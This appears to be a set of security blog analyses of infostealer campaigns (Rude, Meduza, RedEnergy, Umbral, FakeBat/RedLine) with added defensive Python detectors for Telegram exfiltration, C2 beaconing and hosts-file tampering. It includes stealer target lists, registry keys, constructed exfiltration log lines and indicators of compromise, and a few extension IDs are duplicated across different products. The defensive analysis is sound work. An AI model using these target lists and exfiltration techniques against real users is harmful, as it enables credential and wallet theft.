During the next step, the Rude Stealer gathers a list of active processes on the compromised system. The details it records include process names and IDs. Apart from gaming platforms, Rude Stealer also retrieves a wide range of system-related information. Nothing unusual here – it gathers IP address, country, CPU architecture, and RAM amount. All of this data is saved in a text file. Additionally, this stealer can capture screenshots using the Java Robot class, which are then saved in the user profile directory.

Image: Rude Stealer using the DirectX Diagnostic Tool (dxdiag)

Data Transmission and Cleanup

Once all the information is collected, Rude Stealer compiles it into a ZIP archive named after the computer and sends it to the TAs’ Telegram channel through the Telegram Bot API. It finishes by “melting”: removing the files and directories linked to its presence.
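Rude Stealer, Phemedrone Stealer and Ov3r_Stealer (all covered above) hand their loot to the Telegram Bot API, which means the bot token and chat ID travel in the request URL and can be pulled straight from proxy or EDR network logs. The Python below is an added example rather than any vendor’s code: it matches Bot API calls, masks the token for the report, extracts the chat_id, and rates a POST to sendDocument/sendMessage from a non-browser process as high. The log lines and their tab-separated format are constructed for the example; the token shape (numeric bot ID, colon, 35 characters) follows the examples in Telegram’s own documentation, and the process allow-list is an assumption.

```python
import re
from urllib.parse import urlparse, parse_qs

# Bot API calls carry the bot token in the path; the token shape follows Telegram's documentation examples.
TELEGRAM_BOT_CALL = re.compile(
    r"^https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{35})/(?P<api_method>[A-Za-z]+)$")
# Methods the stealers above use to push loot; getUpdates and friends are bot housekeeping and are ignored.
EXFIL_METHODS = {"sendDocument", "sendMessage", "sendPhoto"}
# Processes for which Bot API traffic may be legitimate (assumed allow-list; tune to your estate).
EXPECTED_CLIENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "telegram.exe"}


def parse_line(line):
    """Constructed proxy-log format for this example: ts<TAB>process<TAB>method<TAB>url<TAB>bytes_out."""
    ts, process, http_method, url, size = line.rstrip("\n").split("\t")
    return {"ts": ts, "process": process.lower(), "http_method": http_method, "url": url, "bytes_out": int(size)}


def analyse_telegram(url):
    """If url is a Bot API call, return bot id, masked token, API method and chat_id; otherwise None."""
    parsed = urlparse(url)
    match = TELEGRAM_BOT_CALL.match(f"{parsed.scheme}://{parsed.netloc}{parsed.path}")
    if not match:
        return None
    chat_id = parse_qs(parsed.query).get("chat_id", [None])[0]
    return {"bot_id": match["bot_id"],
            "token_masked": f"{match['bot_id']}:{match['secret'][:4]}...",   # never write the full secret to a report
            "api_method": match["api_method"], "chat_id": chat_id}


def find_exfil(lines):
    """Return one finding per log line that looks like loot being pushed to a Telegram bot."""
    findings = []
    for line in lines:
        event = parse_line(line)
        tg = analyse_telegram(event["url"])
        if not tg or tg["api_method"] not in EXFIL_METHODS:
            continue
        unexpected = event["process"] not in EXPECTED_CLIENTS and event["http_method"] == "POST"
        findings.append({**event, **tg, "severity": "high" if unexpected else "info"})
    return findings


# Constructed log lines (not real traffic): an Ov3r_Stealer-style WerFaultSecure.exe, a JAR running under java.exe,
# a browser session, bot housekeeping from a developer's script, and ordinary browsing. Secrets are dummies.
SAMPLE_LOG = [
    "2024-01-12T10:01:03Z\tWerFaultSecure.exe\tPOST\thttps://api.telegram.org/bot123456789:AAHfExampleExampleExampleExampleExa/sendDocument?chat_id=-1001234567890\t184320",
    "2024-01-12T10:01:04Z\tjava.exe\tPOST\thttps://api.telegram.org/bot987654321:AAEfExampleExampleExampleExampleExa/sendDocument?chat_id=5551234\t99231",
    "2024-01-12T10:02:00Z\tchrome.exe\tPOST\thttps://api.telegram.org/bot123456789:AAHfExampleExampleExampleExampleExa/sendMessage?chat_id=42\t512",
    "2024-01-12T10:02:30Z\tpython.exe\tGET\thttps://api.telegram.org/bot123456789:AAHfExampleExampleExampleExampleExa/getUpdates\t0",
    "2024-01-12T10:03:00Z\tchrome.exe\tGET\thttps://www.example.com/\t0",
]

if __name__ == "__main__":
    for f in find_exfil(SAMPLE_LOG):
        print(f["severity"], f["process"], f["api_method"], f["token_masked"],
              "chat", f["chat_id"], f["bytes_out"], "bytes")
```

Because api.telegram.org is a perfectly ordinary destination, blocking it outright is rarely an option; the useful signal is which process is talking to it and whether it is uploading. The extracted bot ID and chat ID are indicators worth sharing with Telegram’s abuse channel and with other victims, but avoid calling the API with a recovered token yourself: it is someone else’s account, and it tips off the operator.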

Based on the evidence found during the analysis, researchers inferred that Rude Stealer is probably being operated by a TA associated with or operating from Turkey. This assumption is supported by the fact that the stealer gathers the time of the compromised system and converts it to Turkey’s time zone.

Image: conversion of the system time to Turkey’s time zone

Recommendations

Despite being a simple Java-based stealer, Rude Stealer is still a significant threat to individuals and organizations. Its use of dxdiag, a legitimate diagnostic tool, to gather system details is particularly notable because that activity blends in with normal administration.

  • Disable the automatic password-saving in the browser. This is an essential step because stealers often target web browser data. Instead, you can use a password manager to manage and store your passwords securely.
  • Establish stringent access controls for system tools. Since Rude Stealer runs dxdiag to gather hardware details, consider restricting which users can run such tools, or use application allowlisting; at minimum, alert on dxdiag being spawned by java.exe or another unexpected parent process.
  • Monitor the creation of text files in user profile folders. Rude Stealer writes its loot to text files under the user profile before archiving it. Outright blocking text-file creation in paths like “C:\Users\[username]” would break legitimate applications, so in practice this is better implemented as a file-system audit or EDR rule that alerts when an unusual process (here, a Java process) writes such files there.
  • Use an anti-malware solution. Maintaining up-to-date anti-malware and internet security software is crucial for protecting against malware. These tools can detect and block malicious code from executing on your devices.

Malicious CPU-Z Copy Is Spread In Google Search Ads
https://gridinsoft.com/blogs/fake-cpu-z-google-ads/ (Wed, 15 Nov 2023 13:18:30 +0000)

Attackers are again abusing the Google Ads platform to distribute malicious advertising that delivers the RedLine information stealer. This time, the ads promoted a trojanized version of the CPU-Z tool.

CPU-Z Malware in the WindowsReport Page Clone

Recently, a wave of malicious ads on Google Search result pages offered users a trojan-infected version of the popular CPU-Z program. For better disguise, the malware was hosted on a clone of the legitimate news site WindowsReport. Since many users do not know which site is the product's official one, the trick was quite effective.

Malvertising on Google Ads with RedLine

Clicking on such an advertisement sends the victim through a series of redirects that fooled Google's security scanners and filtered out crawlers, VPN users, bots and the like, sending those to a decoy site that contained nothing malicious.

Redirects (source: Malwarebytes)

Users ended up on a fake news site hosted on one of several attacker-controlled domains.

The result of these manipulations is a chain attack that starts with the FakeBat loader, which in turn deploys the well-known RedLine infostealer, an old-timer of the scene.

What is RedLine Infostealer?

Downloading the CPU-Z installer from the attackers' resource delivered an MSI file containing a malicious PowerShell script, which researchers identified as the FakeBat malware loader (aka EugenLoader). This loader fetched the RedLine payload from a remote URL and launched it on the victim's computer.

Redline is a powerful data theft tool that can steal passwords, session tokens, cookies, and vast amounts of other stuff. We have a dedicated article with the complete tech analysis of this malware – consider checking it out.

Earlier, we wrote about another way cybercriminals distribute the RedLine infostealer: through sites offering a fake MSI Afterburner utility. That campaign also used various domains that users could mistake for the official MSI website, and the imitation of the brand's resources was done quite well.

According to Google representatives, all malicious ads associated with the hacker campaign to distribute the infected CPU-Z tool have now been removed, and appropriate action has been taken against the accounts associated with them.

This is not the first time that hackers have used Google Ads

This exact malvertising campaign was discovered by analysts, who believe it is part of a previously observed campaign of a similar purpose. Previously, the attackers used fake Notepad++ advertisements to deliver the malware.

In the ads, the attackers promoted URLs that clearly had nothing to do with Notepad++, paired with misleading ad titles. Since the title is much larger and more visible than the URL, many people likely didn't notice the catch.

Let me remind you that we talked about how malware operators and other hackers are increasingly using Google Ads to distribute malware to users who are looking for popular software. So, you can encounter malicious ads when searching for Slack, Grammarly, Dashlane, Audacity, and dozens of other programs.

Meduza Stealer: What Is It & How Does It Work?
https://gridinsoft.com/blogs/meduza-stealer-analysis/ (Wed, 19 Jul 2023 14:20:31 +0000)

The malware world evolves constantly, and it would be reckless to ignore newcomers and their potential. Meduza Stealer appears to be a pretty potent stealer variant with unique features and an unusual marketing model. Additionally, this malware may be considered the first of a new malware generation, one that breaks the old geolocation filtering rules.

What is Meduza Stealer?

Meduza is an all-encompassing infostealer which, at a glance, looks similar to the old guard. However, well-known families such as RedLine or Raccoon gained the ability to steal cryptocurrency data only through later updates. Meduza, on the other hand, can do this out of the box, and can get around the trickier protection measures of crypto apps. Moreover, the list of wallets and browsers it can extract data from is much longer than that of any of the mentioned stealers.

The distinctive feature of Meduza Stealer is the way it hides its samples. Instead of a usual packing, hackers use code obfuscation and recompiling, which allows them to circumvent even the most robust anti-malware engines. Well, these approaches do not sound like something phenomenal, but when applied together, and in an unusual way, things may become way less predictable – and detectable.

This is not the full list of unusual things about this malware. Pricing-wise, it is offered under two fixed plans and a negotiable lifetime license. For $199 you get the malware, all possible customization options for the payload, the admin panel, and the ability to download all the logs in one click, for a term of 1 month. The same package costs $399 for 3 months. And the cherry on top, as I said, is the ability to negotiate the price of a lifetime license. Possibly the developers are even ready to share the source code, but that is only a guess, based on groups that used such a model earlier.

Promotion of Meduza Stealer in Telegram. Channels are exclusively Russian.

An Offspring of Aurora Stealer?

There are plenty of examples of how brand-new malware turns out to be a re-branded old sample with a slightly different team of crooks behind it. Malware is rarely developed by a single person. Developers of one malware may start working on another and bring their prior developments into the new product. Alternatively, part of a cybercrime gang that stopped operating may decide to resume its illegal deeds, rebranding its "tools" to start with a new image. One way or another, this is a common occurrence.

In the case of Meduza Stealer, things are not that straightforward. Due to the use of enhanced obfuscation, it is hard to say whether it shares any code details with known malware families. Some malware analysts claim that Meduza is an offspring of Aurora Stealer – malware that popped out in late 2022. Their main arguments are similarity in the form of C2 calls and logs with collected data.

Similarity in logs of Aurora and Meduza Stealers

As you can see, Meduza's logs resemble Aurora's in the ASCII-styled header and some visual elements. However, this is not definitive: malware developers sometimes take inspiration from, or outright copy, elements of other malware families. Researchers also point to similar file naming conventions, but that is not strong evidence either.

This, however, caused a harsh reaction from the malware developers. In their "support" channel they called all the proofs rubbish and also said they had picked up the trail of whoever leaked the malware build. There is also decent evidence for Meduza's originality: it is written in C++, which is nothing like the Golang used in Aurora Stealer.

The reaction of the Meduza developer to the analysts' claims that the malware is an Aurora Stealer copy

Meduza Stealer Analysis: Catch Me or I Catch You

The threat that comes from each specific malware sample roughly depends on two factors: how hard it is to detect it and how much damage it can deal. Meduza Stealer tries to outpace its counterparts in these two factors. It is not the most stealthy malware, for sure, and there are ones that steal even more data, but rare samples may boast of a combination of these two. And Meduza does.

Meduza Stealer Exec Chain

The picture above shows a simplified scheme of the Meduza Stealer operation process. First of all, it checks the geolocation of the attacked system by its IP address. Here lies another unusual feature of this malware: it has the typical ban list of countries for malware from Russia, but the list does not include Ukraine. Instead, the malware exits if the IP of the attacked system is in Georgia, which has become a popular destination among Russians trying to avoid enlistment in the army. Overall, the malware will not run in Armenia, Belarus, Georgia, Kazakhstan, Kyrgyzstan, Moldova, Russia, Tajikistan and Turkmenistan.

Code in the malware's PE file that bans its execution in certain countries.

The very next step is contacting the C2 server. This is not very common among stealers, as most of them contact the C2 only after the data theft succeeds. Meduza instead contacts the server immediately after confirming that the system is not in a forbidden location, but without taking any further action: it sends a blank POST request that receives no response from the server. Only if the connection succeeds does the malware keep going.

Data Gathering

As I said, Meduza is distinctive for an outrageously wide number of web browsers, desktop apps, and crypto-wallets it can rummage through. More common malware samples usually stop on the most popular apps and wallets, including some from alternative options. This one, however, does not disdain even underdogs. Kinza, Mail.ru, Atom, Amigo – some of them are even considered PUPs by security vendors, and I bet you didn’t even know that some of them exist.

List of browsers Meduza gathers data from:

Chrome Chrome Beta Chrome SxS 360ChromeX ChromePlus
Chromium Edge Brave Browser Epic Privacy Browser Amigo
Vivaldi Kometa Orbitum Atom Comodo Dragon
Torch Comodo Slimjet 360Browser 360se6
Baidu Spark Falkon AVAST Browser Waterfox BitTubeBrowser
NetboxBrowser Mustang InsomniacBrowser Maxthon Viasat Browser
Opera Stable Opera Neon Opera Crypto Developer Opera GX Stable QQBrowser
SLBrowser K-Meleon Go! Secure Browser Sputnik
Nichrome CocCoc Browser Uran Chromodo YandexBrowser
7Star Chedot CentBrowser Iridium Naver Whale
Titan Browser SeaMonkey UCBrowser CLIQZ Flock
BlackHawk Sidekick Basilisk GhostBrowser GarenaPlus
URBrowser IceDragon CryptoTab Browser Pale Moon Superbird
Elements Browser Citrio Xpom ChromiumViewer QIP Surf
Liebao Coowon Suhba TorBro RockMelt
Bromium Kinza CCleaner Browser AcWebBrowserr CoolNovo
SRWare Iron Mozilla Firefox AVG Browser Thunderbird Blisk
Cyberfonx SwingBrowser Mozilla IceCat SalamWeb SlimBrowser

Browsers store passwords and autofill info in different ways, and the malware has an approach for each. For browsers that keep such data in a database, the malware issues an SQL query that simply extracts all the valuables. Other, less secure browsers keep this info in a plain text file, which is not a big quest to find.

Another point of interest for stealer malware in web browsers is cookie files. Cookies can contain anything from almost useless shopping cart contents to session tokens, usernames, emails and the like. Cookie files can be of great value to data thieves, especially when they are fresh. One may say: just like the real ones.

Desktop apps

Aside from web browsers, Meduza Stealer gathers information from several desktop applications, namely Telegram, Steam, and different Discord clients. To put its hands on Steam session tokens, malware gets to the program’s registry key in the CurrentUser branch. The HKCU\Software\Valve\Steam key contains a lot of info, aside from login data and session information – so malware does not go purely for the account.

Telegram does not keep login details in such an accessible form, though the malware manages to gather sensitive information in a similar way. By checking the following two keys, Meduza can get information about the system kept in Telegram session info, app versions, usernames and other important details.

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C4A4AE8F-B9F7-4CC7-8A6C-BF7EEE87ACA5}_is1

Discord is also a tough nut when it comes to grabbing session info. For that reason, the malware limits itself to the system info recorded in a session, app configuration and the like. Contrary to the two other apps, this is done directly in the program's folder. The malware targets several different editions of Discord, as the free API allows creating forks and user modifications.

2FA Extensions

Well, did I say that Meduza is ravenous when it comes to data gathering? Hold your 2FA browser extensions close: the malware hunts them as well. The list of add-ons it targets is not as long as the browser list, though there are not that many such extensions to begin with.

Extension name Web Store ID
Authenticator 2FA bhghoamapcdpbohphigoooaddinpkbai
Authenticator 2FA ocglkepbibnalbgmbachknglpdipeoio
EOS Authenticator oeljdldpnmdbchonielidgobddffflal
Trezor Password Manager imloifkgjagghnncjkhggdhalmcnfklk
GAuth Authenticator ilgcnhelpchnceeipipijaljkblbcobl
1Password oeljdldpnmdbchonielidgobddffflal
1Password dppgmdbiimibapkepcbdbmkaabgiofem
Dashlane Password Manager fdjamakpfbbddfjaooikfcpapjohcfmg
Dashlane Password Manager gehmmocbbkpblljhkekmfhjpfbkclbph
Bitwarden Password Manager nngceckbapebfimnlniiiahkandclblb
Bitwarden Password Manager jbkfoedolllekgbhcbcoahefnbanhhlh
NordPass jbkfoedolllekgbhcbcoahefnbanhhlh
Keeper Password Manager bfogiafebfohielmmehodmfbbebbbpei
RoboForm pnlccmojcmeohlpggmfnbbiapkmbliob
RoboForm ljfpcifpgbbchoddpjefaipoiigpdmag
SSO Authenticator nhhldecdfagpbfggphklkaeiocfnaafm
Zoho Vault igkpcodhieompeloncfnbekccinhapdb
KeePassXC dppgmdbiimibapkepcbdbmkaabgiofem
KeePassXC pdffhmdngciaglkoonimfcmckehcpafo
LastPass hdokiejnpimakedhajhdlcegeplioahd
LastPass bbcinlkgjjkejfdpemiealijmmooekmp
BrowserPass naepdomgkenhinolocfifgehidddafch
MYKI bmikpgodpkclnkgmnpphehdgcimmided
MYKI nofkfblpeailgignhkbnapbephdnmbmn
Splikity jhfjfclepacoldmjmkmdlmganfaalklb
CommonKey chgfefjpcobfbnpmiokfjjaglahmnded
Authy gaedmjdfmmahhbjefcbgaolhhanlaolb

Cryptocurrency wallets

Gathering data about crypto wallets was not widespread among older-gen stealers. With time, most of the families we know and love adopted such functionality. Modern-gen ones have it by default, which probably explains the number of wallets they can gather info from.

MetaMask Binance Wallet BitApp Wallet Coin98 Wallet
SafePal Wallet DAppPlay Guarda EQUA Wallet
GuildWallet Casper Wallet ICONex Math Wallet
Starcoin Hiro Wallet MetaWallet Swash
Finnie Keplr Crocobit Wallet Oxygen
MOBOX WALLET Phantom TronLink XDCPay
Ton Sollet Slope DuinoCoin Wallet
LeafWallet Brave Wallet Opera Wallet CWallet
Flint Wallet Exodus Web3 Wallet Trust Wallet Crypto Airdrops & Bounties
Nifty Wallet Liquality Ronin Wallet Oasis
Temple Pontem Aptos Wallet Solflare Wallet Yoroi
iWallet Wombat Gaming Wallet Coinbase Wallet MEW CX
Jaxx Liberty OneKey Hycon Lite Client SubWallet
Goby TezBox ONTO Wallet Hashpack
Cyano Martian Wallet Sender Wallet Zecrey
Auro Terra Station KardiaChain Rabby Wallet
NeoLine Nabox XDEFI KHC
OneKey CLW Polymesh ZilPay
Byone Eternl Nami Maiar DeFi Wallet

This extensive list contains crypto wallets that can have both desktop and in-browser forms. In such cases, malware treats them in a separate way – by collecting data from registry entries they leave. Here are some examples of keys the malware can read to collect login data from your crypto wallet:


HKCU\SOFTWARE\Etherdyne\Etherwall\geth
HKCU\SOFTWARE\monero-project\monero-core
HKCU\SOFTWARE\BitcoinCore\BitcoinCore-Qt
HKCU\SOFTWARE\LitecoinCore\LitecoinCore-Qt
HKCU\SOFTWARE\DashCore\DashCore-Qt
HKCU\SOFTWARE\DogecoinCore\DogecoinCore-Qt

System fingerprinting

To distinguish between the attacked systems, stealers commonly collect some trivial info about the system. Meduza is no exception: it collects all the basic things that can identify the computer among others.

  • System build details
  • Username
  • Computer name
  • Screen Resolution details
  • Screenshot
  • OS details
  • CPU details
  • RAM details
  • GPU
  • Hardware ID details
  • Execution path
  • Public IP
  • Geo
  • Time
  • TimeZone

Another application for such data comes into view when we remember that Meduza also collects browser cookies. The combination of cookies, passwords and system information allows creating a complete copy of the device, at least from the point of view of a website. There have even been darknet services dedicated specifically to system profile spoofing: you input the cookies and system specs, and it makes your system indistinguishable from the original one. This helps with circumventing even sophisticated protection mechanisms.

Data extraction

All the data Meduza Stealer manages to collect from the infected system is stored in a dedicated folder created after the malware unpacks and runs. When it comes to sending the data to the command server, the malware archives it and uploads the archive, nothing unusual there. Since the malware uses an encrypted connection for C&C communication, the exfiltration is not that easy to detect.

Code responsible for the C2 server connection in Meduza Stealer.

Contrary to "classic" stealers like Vidar, Meduza does not perform the meltdown once it finishes data collection. It keeps running in the background, periodically pinging the C2 and waiting for commands. There is a command for self-removal, but it is most likely sent only in exceptional cases.
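The two network traits described in this analysis, the blank POST on first contact and the steady ping loop after collection, are exactly what a defender can look for in proxy logs. The script below is an added example (not Gridinsoft's code and not the malware's) that runs over constructed log lines; the log format and the host c2.example.invalid are placeholders.

```python
"""Beacon detection over constructed web-proxy log lines.

Added example for the Meduza analysis above (not Gridinsoft's code and not
the malware's): the article notes that Meduza contacts its C2 with a blank
POST right after the geolocation check and, instead of melting down, keeps
pinging the C2 on a timer. Grouping requests by (client, destination) and
measuring how regular the gaps between them are surfaces the timer; the
zero-byte POSTs are the first-contact signal. Log format and host names
are constructed for this example.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample log, one request per line:
# "<ISO timestamp> <client> <method> <host> <request-body-bytes>".
# 10.0.0.5 posts an empty body to c2.example.invalid (a placeholder host, not
# an indicator from the article) roughly every 60 s while browsing normally.
SAMPLE_LOG = """\
2023-07-19T10:00:00 10.0.0.5 POST c2.example.invalid 0
2023-07-19T10:00:07 10.0.0.5 GET news.example.net 812
2023-07-19T10:01:01 10.0.0.5 POST c2.example.invalid 0
2023-07-19T10:01:30 10.0.0.5 GET news.example.net 640
2023-07-19T10:01:59 10.0.0.5 POST c2.example.invalid 0
2023-07-19T10:02:44 10.0.0.5 GET shop.example.org 1204
2023-07-19T10:03:00 10.0.0.5 POST c2.example.invalid 0
2023-07-19T10:03:05 10.0.0.5 GET news.example.net 733
2023-07-19T10:03:20 10.0.0.5 GET news.example.net 515
2023-07-19T10:04:02 10.0.0.5 POST c2.example.invalid 0
2023-07-19T10:04:58 10.0.0.5 POST c2.example.invalid 0
2023-07-19T10:06:01 10.0.0.5 POST c2.example.invalid 0
2023-07-19T10:09:12 10.0.0.5 GET news.example.net 901
"""


def parse_log(text):
    """Return a list of (timestamp, client, method, host, body_bytes) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, host, body = line.split()
        events.append((datetime.fromisoformat(ts), client, method, host, int(body)))
    return events


def empty_posts(events):
    """(client, host) pairs that received a POST with no body: the pattern the
    article describes for Meduza's first C2 contact."""
    return {(c, h) for _ts, c, m, h, n in events if m == "POST" and n == 0}


def find_beacons(events, min_hits=5, max_jitter=0.25):
    """Return {(client, host): (hits, mean_gap_s, jitter)} for pairs whose
    connection intervals are regular enough to look like a timer.

    jitter is the coefficient of variation (stdev / mean) of the gaps; human
    browsing scatters widely, a sleep() loop does not.
    """
    by_pair = defaultdict(list)
    for ts, client, _m, host, _n in events:
        by_pair[(client, host)].append(ts)
    beacons = {}
    for pair, stamps in by_pair.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        jitter = pstdev(gaps) / avg
        if jitter <= max_jitter:
            beacons[pair] = (len(stamps), round(avg, 1), round(jitter, 3))
    return beacons


if __name__ == "__main__":
    evts = parse_log(SAMPLE_LOG)
    print("empty POSTs:", empty_posts(evts))
    for (client, host), (hits, gap, jit) in find_beacons(evts).items():
        print(f"beacon: {client} -> {host}: {hits} hits, ~{gap}s apart, jitter {jit}")
```

Real C2 traffic is wrapped in TLS, so a proxy log would show CONNECT entries or SNI rather than POST bodies; the timing analysis works the same on those.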

How to protect against Meduza Stealer?

Actually, the ways to protect against Meduza are the same as in the case of any other stealers. However, there is a difference dictated by the exceptional detection evasion capabilities of this malware. For efficient prevention of Meduza stealer activity, a strong heuristic protection is essential.

Be careful with all things that can act as a malware source. Email spam or phishing posts in social media are among the most exploited ways of malware spreading. A less popular, but sometimes even more efficient approach is exploiting Google Ads in search results. Fraudsters will do their best to make you believe that the thing is legit, and you should not fear interacting with it.

Implement preventive anti-malware measures. To weed out malware with such an unusual detection evasion model the program should include a sturdy heuristic engine. Additionally, you can seek solutions with email protection functions and CDR applications. They help you to secure one of the possible attack vectors.


Avoid cracked software. Yet another place used for malware spreading is cracked programs; they have served this purpose for over two decades now. Even though their share has shrunk in recent years, you can still get something nasty from there. A crack can carry dropper malware, which will then inject anything else, from spyware to ransomware.

RedEnergy Stealer-as-a-Ransomware On The Rise
https://gridinsoft.com/blogs/redenergy-stealer-as-a-ransomware/ (Tue, 04 Jul 2023 13:10:28 +0000)

Researchers have discovered a new form of malware called RedEnergy Stealer. It is categorized as Stealer-as-a-Ransomware but is not affiliated with the Australian company Red Energy.

RedEnergy Stealer uses a sneaky tactic to steal sensitive data from different web browsers. Its main distribution method is fake updates: pop-ups and banners that bait the user into installing what looks like an update but is actually the malicious payload. RedEnergy also has multiple modules that can carry out ransomware activities. Despite using common method names, the malware has kept its original name. RedEnergy is classified as Stealer-as-a-Ransomware because it can function as both a stealer and ransomware.

Detection names on the VirusTotal site

What is RedEnergy Malware?

RedEnergy is malware designed to look like a legitimate browser update, tricking users into downloading and installing it. It imitates well-known browsers like Google Chrome, Microsoft Edge, Firefox and Opera, and once triggered, it drops four files (two temporary files and two executables) onto the targeted system. One of these files contains the malicious payload and starts a background process. The payload displays an insulting message to the victim once executed.

RedEnergy infection chain

RedEnergy also persists on an infected system across restarts and shutdowns, which lets it continue its harmful activities uninterrupted. As part of its operation, it encrypts the victim's data and adds the ".FACKOFF!" extension to all encrypted files. It then demands payment to restore access to the files through a ransom note ("read_it.txt") and changes the desktop wallpaper.

Encrypted files with the .FACKOFF! extension

One of the things the ransomware does is delete volume shadow copies, which means that any backups kept there are erased. In addition, the malware changes the desktop.ini file, which holds basic settings for file system folders; by doing so, RedEnergy can alter how folders appear, making it easier to hide its activity on the system. Lastly, RedEnergy can steal data from different web browsers, potentially giving it access to personal information, login details, financial data, online activity, session-related information and other essential data.

Threat Summary

Name: RedEnergy Stealer-as-a-Ransomware
Threat Type: Information stealer, ransomware
Encrypted Files Extension: .FACKOFF!
Ransom Demanding Message: read_it.txt
Cyber Criminal Contact: georger1212@proton.me
Ransom Amount: 0.005 BTC

How does RedEnergy Malware work?

This threat campaign uses a deceitful redirection technique to trick users. When users try to access the targeted company’s website through their LinkedIn profile, they are unknowingly sent to a malicious website. On this website, they are asked to download what seems like a legitimate browser update, presented as four different browser icons. However, this is a trap, and the unsuspecting user downloads an executable file called RedStealer instead of an actual update.

Example of a malicious download site

A deceptive threat campaign uses a misleading download domain, www[.]igrejaatos2[.]org. The domain poses as a ChatGPT site, but it is counterfeit and aims to trick victims into downloading a fake offline version of ChatGPT. The zip file contains the same malicious executable as before, and victims unknowingly acquire it upon downloading.


How to avoid installation of RedEnergy Malware?

Individuals and organizations must exercise extreme caution when accessing websites, particularly those linked to LinkedIn profiles. Verifying browser updates’ authenticity and being wary of unexpected file downloads are paramount to protecting against such malicious campaigns.

To prevent negative consequences, there are several essential steps to take:

  • Update your operating system and software regularly.
  • Be cautious when dealing with email attachments or suspicious links, especially from unknown sources.
  • Consider using reliable antivirus or anti-malware software to provide extra protection and conduct regular system scans.
  • Avoid downloading files from untrusted websites and be wary of pop-up ads or misleading download buttons that may contain harmful content.

Super Mario Malware: Hackers Spread Stealers in the Fake Game
https://gridinsoft.com/blogs/trojanized-version-super-mario-malware/ (Wed, 28 Jun 2023 14:01:57 +0000)

The Super Mario video game franchise has gained immense acclaim for its platforming gameplay, lively visuals and memorable characters. Recently, the franchise has seen a renewed surge in popularity with the release of new games and animated movies. It has consistently evolved by introducing innovative game mechanics, power-ups and levels across titles and gaming consoles. Since its establishment in the 1980s, Super Mario games have amassed a vast global fanbase, bringing joy and immersion to millions of players worldwide.

Trojans Hide in the Super Mario Game

Criminals can monetize malware distributed through the game: trojanized installers steal sensitive information, launch ransomware attacks and perform other malicious actions. Previously, researchers discovered several malware campaigns targeting gamers and their game-related applications, including Enlisted, MSI Afterburner and others.

Experts found a compromised version of the Super Mario Bros game installer that contains several harmful components: an XMR miner, the SupremeBot mining client and the open-source Umbral stealer. These malicious files were packaged with the legitimate installer file super-mario-forever-v702e. This incident highlights another reason TAs use game installers as a delivery mechanism: the powerful hardware commonly associated with gaming provides valuable computing power for mining cryptocurrencies.

Here is the infection chain of the compromised Super Mario Game installer:

Infection chain of the compromised Super Mario Game installer

What is the Umbral Stealer virus?

Umbral Stealer is a dangerous malware that can capture sensitive user information by taking screenshots of the Windows desktop or recording media from connected webcams. The stolen data is saved locally and then sent to the C2 server. To avoid detection by Windows Defender, the malware turns the program off unless tamper protection is enabled; if it is, the malware adds its own process to Defender's exclusion list instead. The malware also interferes with popular antivirus products' communication with their vendors' sites by modifying the Windows hosts file, rendering them ineffective.
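The hosts-file trick mentioned above leaves a trace that is easy to audit: security-vendor hostnames pinned to a loopback or black-hole address. The script below is an added example (not Gridinsoft's code and not the malware's) that parses a constructed hosts file and reports such entries; the vendor hostnames in it are placeholders.

```python
"""Hosts-file tamper check.

Added example for the Umbral Stealer section above (not Gridinsoft's code and
not the malware's). The article says the stealer edits the Windows hosts
file so antivirus products can no longer reach their vendors' sites; the
common way to do that is to pin those hostnames to a loopback or black-hole
address. This parser reports every such pinning apart from the standard
localhost entries. The file content below is constructed; vendor hostnames
are placeholders.
"""
import ipaddress

# Names that are legitimately mapped to loopback on a stock system.
BENIGN_LOOPBACK_NAMES = {
    "localhost", "localhost.localdomain", "broadcasthost",
    "ip6-localhost", "ip6-loopback",
}

# Constructed hosts file: two sinkholed security-vendor hosts, one normal LAN entry.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
# localhost name resolution is handled within DNS itself.
127.0.0.1       localhost
::1             localhost
192.168.1.10    fileserver.corp.example   # ordinary LAN mapping, not suspicious
0.0.0.0         updates.av-vendor.example   # placeholder vendor host, black-holed
127.0.0.1       telemetry.security-vendor.example   # placeholder, looped back
"""


def parse_hosts(text):
    """Return [(address, hostname, line_no)], one tuple per hostname on a line."""
    entries = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # drop comments and padding
        if not line:
            continue
        addr, *names = line.split()
        entries.extend((addr, name.lower(), line_no) for name in names)
    return entries


def is_sinkhole(addr):
    """True for loopback (127/8, ::1) and unspecified (0.0.0.0, ::) targets."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return ip.is_loopback or ip.is_unspecified


def suspicious_entries(text, allowlist=BENIGN_LOOPBACK_NAMES):
    """Hostnames pinned to a sinkhole address that are not normal localhost aliases."""
    return [e for e in parse_hosts(text)
            if is_sinkhole(e[0]) and e[1] not in allowlist]


if __name__ == "__main__":
    for addr, name, n in suspicious_entries(SAMPLE_HOSTS):
        print(f"line {n}: {name} -> {addr}")
```

On Windows the file to feed in lives at %SystemRoot%\System32\drivers\etc\hosts; the same check applies to /etc/hosts on Linux and macOS.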

Umbral Stealer is a C# information stealer that has been open-source and available on GitHub since April 2023. This Stealer steals various types of data from infected Windows devices, such as stored passwords and session tokens in web browsers, cryptocurrency wallets, and authentication tokens for popular platforms like Discord, Minecraft, Roblox, and Telegram.

How to protect against Trojanized Super Mario?

If you recently installed Super Mario 3: Mario Forever, it is recommended to follow these steps to ensure your PC's safety:

  • Users need to monitor their system performance and CPU usage regularly.
  • Installing a reputable antivirus and internet security software package on all connected devices, including PCs, laptops, and mobile devices, is highly recommended.
  • Scan your PC for any malware and remove it if detected.
  • To ensure your safety, reset your passwords for sensitive accounts such as banking, financial, cryptocurrency, and email.
  • Use a unique password for each account and store it in a password manager for added security.
  • Download games or any other software only from official sources like the publisher's website or trustworthy digital content distribution platforms.
